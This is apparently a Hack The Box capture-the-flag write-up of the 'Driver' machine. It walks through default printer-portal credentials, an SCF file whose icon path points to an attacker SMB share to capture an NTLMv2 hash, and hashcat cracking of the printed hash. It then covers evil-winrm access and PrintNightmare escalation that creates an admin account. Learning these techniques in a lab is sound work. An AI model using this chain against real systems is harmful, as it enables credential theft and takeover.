Engagement flow
Summary
This was an easy rated machine that started off light with some default login credentials for our initial foothold into the MFP printer center. From here we identified a possible SCF file injection vulnerability and later tested and confirmed which provided the ability to utilize responder and force an NTLMV2 authentication attempt by the server with out rogue responder over SMB. From here we cracked the hash and utilized evil-winrm to login to the target as user Tony. From here we pivoted and enumerated internally learning about a Ricoh PLC6 driver which has a printer nightmare vulnerability. We faced some obstacles in trying to execute the various printer nightmare scripts due to the execution policy prevention policies. We were able to bypass this by using the scripting function within Evil-WinRM to import the printer nightmare and invoke functions from within in order to obtain root.
Tools used
Responder (SMB server)
Hashcat
Evil WinRM
WinPeas
Processes/Techniques
SCF injection
Hash capturing NTLMv2
Rogue server (MITM) use
Internal enumeration
Printer nightmare vulnerability
References
Enumeration
A basic nmap scan reveals 3 ports open. We are missing the usual suspect, port 22 for our SSH connections. We do however have the regular port 80 and two ports suggestive that SMB is in use, port 135/445.
We perform a more in-depth scan with the -sC and -sV flags. We learn our target is running Windows IIS http 10.0. We can also see that SMB has guest and user authentication enforced and protected closing the door for authenticated attacks at this stage.
Web enumeration
Browsing over to the web page provides a prompt requesting that we authenticate in order to proceed. The prompt provides the details revealing our target is some type of printer related portal. Entering default credentials of admin:admin grants access. (that does not happen often. Usually you have to find default credentials from the device manual under setup instructions)
MFP Firmware Update Center
Our landing page is quite basic and straight forwards. The only link that worked from the above ribbon is the Firmware Updates center.
Initial foothold
In this stage we performed a fair amount of research and testing with many questions posted on the Hack the Box forum. This lead to the understanding and exploration of a new type of attack known as SCF file injection. SCF stands for shell command file. This is a way to pass shell commands over the SMB protocol for execution on a target host. Some research provided the two links below with offer a very nice explanation.
Configure an .scf file
[Shell]
Command=2
IconFile=\\10.10.14.24\share\test.scf
[Taskbar]
Command=ToggleDesktop
Fire up responder and confirm responder is running an SMB server.
From here we upload our scf file over the MFP Firmware Update Center and click submit. From here we should see activity on our responder server.
We can see that we successfully conducted a man in the middle attack. Responder was able to spoof our target and capture the SCF file transmission and authentication hash required to transfer this file.
Crack the hash
We take this hash and run it through hashcat. First we have to map the NTLMv2 hash in hashcat. This is id 5600 and we combine this with the common wordlist rockyou.txt. We finally arrive at the password liltony.
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
tony::DRIVER:318176a96a4b3650:695C6727BCA1FCED2457FAB5A990D343:0101000000000000001475FB8430D8018B78B6606899D06E0000000002000800340035003200430001001E00570049004E002D00390042003800550051004800300033005A004900390004003400570049004E002D00390042003800550051004800300033005A00490039002E0034003500320043002E004C004F00430041004C000300140034003500320043002E004C004F00430041004C000500140034003500320043002E004C004F00430041004C0007000800001475FB8430D80106000400020000000800300030000000000000000000000000200000A88F15A0CDD2E31A163DF538EFC1B299CE43C13228698CE67780D4B48BFEA9820A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003400000000000000000000000000
Initial connection
Having a valid set of credentials we proceeded to connect to the target host. However SSH over port 22 is not present. Luckily we can connect over the SMB protocol by utilizing evil-winrm.
We upload and run winpeas to help perform some initial enurmation.
Evidence 1
The Powershell history of user tony may reveal valuable information.
Directory of C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
09/28/2021 11:06 AM 134 ConsoleHost_history.txt
We take a look and simply learn that a Ricoh PCL6 was added with a PCL6 universal driver.
Evidence 2
We see that the Firewall status is set to standard profile and enabled.
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Firewall
Remote admin mode = Disable
Evidence 3
Reviewing internal protocol we notice port 5985 for winrm is in use. This is likely from our evil-winrm tool.
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
5985 TCP Enable Inbound winrm
ICMP configuration for Domain profile:
Mode Type Description
Evidence 4
We review hidden folders which winpeas identified for us. We again noticed this Ricoh_drv which was used for the Ricoh printer. Performing some research into the Ricoh printer reveals vulnerabilities based on various versions. This includes the printer nightmare vulnerability.
Searching hidden files or folders in C:\Users home (can be slow)
C:\Users\All Users\ntuser.pol
C:\Users\All Users\RICOH_DRV
C:\Users\Default User
C:\Users\Default
C:\Users\All Users
C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2
C:\Users\tony\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1
C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2
C:\Users\tony\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Windows.ContactSupport_10.0.10240.16384_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG1
C:\Users\tony\ntuser.pol
C:\Users\All Users\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\do_not_delete_folders
Ricoh PCL6 Vulnerability
Reading the article below provides some insight into the ricoh printer driver attack that allows for privilege escalation.
I had some trouble getting the exploit to work and learned how to leverage winrm to import module's. Execution policy was restricted so I could not import the functions of printer nightmare directly from powershell.
In order to import modules into windows by packing them into Evilwin, I had to specify a script area in the initial winrm connection.
└─$ evil-winrm -i 10.129.95.238 -u tony -p liltony -s /home/kali/HTB/driver/
Root
Looking at the evil winrm menu we have an option to utilize a dll-loader and binary invoker which may work as well, but I have not tested.
I simple called our script by typing exploit.ps1 at the winrm cmd line. Here we can see the addition of the printer nightmare functions. It is listed under get_nightmare_dll.
From here we called the Invoke-Nightmare function and it successfully executes, creating a local administrator account named 'adm1n' and 'P@ssw0rd'
From here we utilize evil-winrm to connect with our new credentials captured from the printer nightmare exploit.
Comments